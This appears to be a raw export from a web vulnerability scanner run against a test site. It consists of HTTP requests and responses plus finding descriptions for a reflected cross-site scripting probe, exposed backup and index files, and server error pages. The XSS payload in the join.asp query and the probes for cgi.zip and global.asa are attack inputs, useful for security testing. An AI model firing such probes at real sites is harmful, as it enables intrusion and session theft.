User Name: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="TEXT" NAME="account" VALUE="" SIZE=14></FONT><BR>
<IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=1 HEIGHT=4><BR>
<FONT FACE="VERDANA,ARIAL" SIZE=2>
Password: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="PASSWORD" NAME="pwd" VALUE="" SIZE=12></FONT><BR>
<FONT SIZE=2 FACE="VERDANA,ARIAL"><b>
<BR>
<INPUT TYPE="SUBMIT" NAME="change" VALUE="Login">
</TD>
</TR>
</TABLE>
<INPUT TYPE="HIDDEN" NAME="cache" VALUE="681">
</FORM>
<SCRIPT LANGUAGE="JavaScript">
<!--
var MC=document.cookie;
var temp;
if(MC){
var start=MC.indexOf("!!");
var end=MC.indexOf("!!",start+2);
temp=MC.substring(start+2,end);
if(temp.length > 1 && temp.length < 20){
document.form1.account.value=temp;
}
}
// -->
</SCRIPT>
<BR>
</TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/bottom_blend.gif" WIDTH=585 HEIGHT=15><BR>
</TD>
<TD BGCOLOR="#33CC99"><IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR></TD>
</TR>
</TABLE>
<IMG SRC="http://www.heardinthehive.com/adimages/account_footer.gif" WIDTH=625 HEIGHT=25><BR>
<TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0>
<TR>
<TD align=right>
<font face=arial size=1>powered by <a href="http://www.adcycle.com">adcycle.com</a> v0.77b <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Login FormA possible login form was found.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
type=['"]?password['"]?GET /forgot1.asp?get=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Location: forgot2.asp?msg2=no&msg=We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?get=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert("XSS")</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>>"><script>alert("XSS")</script></attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /_private/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_private/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_private/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /admin/cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:37 GMT
Content-Type: application/x-zip-compressed
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "7ac34bf7a9dc11:8f6"
Content-Length: 82
<html> This should not show up. if so it is because it does not check right</html>Backup File (cgi.zip)A compressed file of CGI scripts was found. This is usually due to an administrator or developer backing up all their scripts into a single backup file. This is extremely dangerous. By downloading this file, any attacker can retrieve the names and source of all the CGI scripts located on the web server.GET /admin/<attack>cgi.zip</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |Content-Type:\stext/htmlGET /_vti_bin/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:46:50 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_vti_bin/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /global.asa HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:30:15 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 4231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</id></h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Edit the page address in the Address bar to remove global.asa and press <strong>Enter</strong>.</li>
<li>If a link brought you to this Web page, contact that Web site's administrator.</li>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script> home page, and then look for links to the information you want.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> Homepage();</script> home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP Error 500-15 - Requests for global.asa not allowed<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=500.15&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Server Error MessageA server error message was found.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
500GET /global.asa HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:30:15 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 4231
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</id></h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Edit the page address in the Address bar to remove global.asa and press <strong>Enter</strong>.</li>
